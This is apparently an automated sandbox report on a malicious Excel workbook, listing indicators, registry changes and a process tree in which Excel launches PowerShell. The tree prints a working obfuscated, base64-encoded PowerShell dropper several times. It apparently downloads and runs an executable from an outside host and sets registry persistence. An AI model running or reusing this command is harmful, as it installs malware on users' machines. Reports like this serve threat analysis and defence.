0a4bc12bdcd24aabd6cb2711654e17a513f442fec08026387f953d6b1baa3768

Analysis

max time kernel
1142s
max time network
681s
platform
windows7_x64
resource
win7v20210410
submitted
22-07-2021 01:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ORDER Password 016.xlsb
Size

22KB
MD5

467cd2162bedb716002e3c092eee5dd9
SHA1

75c1029048796673ac7c2eb594e6470f6efce826
SHA256

0a4bc12bdcd24aabd6cb2711654e17a513f442fec08026387f953d6b1baa3768
SHA512

9ae0086d185e4b3075e008b92b3cecab4ab85d49429796235cbb1cb2584380a8b122746e028a79d846ddbfb76a2778fbdc8bb47d36827c3a53cc126338ef074d

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 7 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	268	452	cmd.exe	EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1636	452	cmd.exe	EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1920	452	cmd.exe	EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2032	452	cmd.exe	EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	936	452	cmd.exe	EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	984	452	cmd.exe	EXCEL.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1464	452	cmd.exe	EXCEL.EXE

Blocklisted process makes network request 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
6	1404	powershell.exe
8	1404	powershell.exe
10	1756	powershell.exe
12	1756	powershell.exe
14	944	powershell.exe
15	944	powershell.exe
17	1580	powershell.exe
19	1580	powershell.exe
21	560	powershell.exe
22	560	powershell.exe
24	860	powershell.exe
26	860	powershell.exe
28	740	powershell.exe
29	740	powershell.exe

Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

452 EXCEL.EXE

pid	process
452	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1404	powershell.exe
1404	powershell.exe
1756	powershell.exe
1756	powershell.exe
944	powershell.exe
944	powershell.exe
1580	powershell.exe
1580	powershell.exe
560	powershell.exe
560	powershell.exe
860	powershell.exe
860	powershell.exe
740	powershell.exe
740	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

EXCEL.EXE

pid process

452 EXCEL.EXE

pid	process
452	EXCEL.EXE

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeEXCEL.EXE

description	pid	process
Token: SeDebugPrivilege	1404	powershell.exe
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeDebugPrivilege	944	powershell.exe
Token: SeDebugPrivilege	1580	powershell.exe
Token: SeDebugPrivilege	560	powershell.exe
Token: SeDebugPrivilege	860	powershell.exe
Token: SeDebugPrivilege	740	powershell.exe
Token: SeShutdownPrivilege	452	EXCEL.EXE

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

EXCEL.EXE

pid process

452 EXCEL.EXE
452 EXCEL.EXE
452 EXCEL.EXE
452 EXCEL.EXE
452 EXCEL.EXE
452 EXCEL.EXE
452 EXCEL.EXE

pid	process
452	EXCEL.EXE
452	EXCEL.EXE
452	EXCEL.EXE
452	EXCEL.EXE
452	EXCEL.EXE
452	EXCEL.EXE
452	EXCEL.EXE

Suspicious use of WriteProcessMemory 56 IoCs

Processes:

EXCEL.EXEcmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 452 wrote to memory of 268	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 268	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 268	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 268	452	EXCEL.EXE	cmd.exe
PID 268 wrote to memory of 1404	268	cmd.exe	powershell.exe
PID 268 wrote to memory of 1404	268	cmd.exe	powershell.exe
PID 268 wrote to memory of 1404	268	cmd.exe	powershell.exe
PID 268 wrote to memory of 1404	268	cmd.exe	powershell.exe
PID 452 wrote to memory of 1636	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 1636	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 1636	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 1636	452	EXCEL.EXE	cmd.exe
PID 1636 wrote to memory of 1756	1636	cmd.exe	powershell.exe
PID 1636 wrote to memory of 1756	1636	cmd.exe	powershell.exe
PID 1636 wrote to memory of 1756	1636	cmd.exe	powershell.exe
PID 1636 wrote to memory of 1756	1636	cmd.exe	powershell.exe
PID 452 wrote to memory of 1920	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 1920	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 1920	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 1920	452	EXCEL.EXE	cmd.exe
PID 1920 wrote to memory of 944	1920	cmd.exe	powershell.exe
PID 1920 wrote to memory of 944	1920	cmd.exe	powershell.exe
PID 1920 wrote to memory of 944	1920	cmd.exe	powershell.exe
PID 1920 wrote to memory of 944	1920	cmd.exe	powershell.exe
PID 452 wrote to memory of 2032	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 2032	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 2032	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 2032	452	EXCEL.EXE	cmd.exe
PID 2032 wrote to memory of 1580	2032	cmd.exe	powershell.exe
PID 2032 wrote to memory of 1580	2032	cmd.exe	powershell.exe
PID 2032 wrote to memory of 1580	2032	cmd.exe	powershell.exe
PID 2032 wrote to memory of 1580	2032	cmd.exe	powershell.exe
PID 452 wrote to memory of 936	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 936	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 936	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 936	452	EXCEL.EXE	cmd.exe
PID 936 wrote to memory of 560	936	cmd.exe	powershell.exe
PID 936 wrote to memory of 560	936	cmd.exe	powershell.exe
PID 936 wrote to memory of 560	936	cmd.exe	powershell.exe
PID 936 wrote to memory of 560	936	cmd.exe	powershell.exe
PID 452 wrote to memory of 984	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 984	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 984	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 984	452	EXCEL.EXE	cmd.exe
PID 984 wrote to memory of 860	984	cmd.exe	powershell.exe
PID 984 wrote to memory of 860	984	cmd.exe	powershell.exe
PID 984 wrote to memory of 860	984	cmd.exe	powershell.exe
PID 984 wrote to memory of 860	984	cmd.exe	powershell.exe
PID 452 wrote to memory of 1464	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 1464	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 1464	452	EXCEL.EXE	cmd.exe
PID 452 wrote to memory of 1464	452	EXCEL.EXE	cmd.exe
PID 1464 wrote to memory of 740	1464	cmd.exe	powershell.exe
PID 1464 wrote to memory of 740	1464	cmd.exe	powershell.exe
PID 1464 wrote to memory of 740	1464	cmd.exe	powershell.exe
PID 1464 wrote to memory of 740	1464	cmd.exe	powershell.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\ORDER Password 016.xlsb"
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:452
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c pOw^ERShE^lL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:268
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOwERShElL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1404
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c pOw^ERShE^lL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAY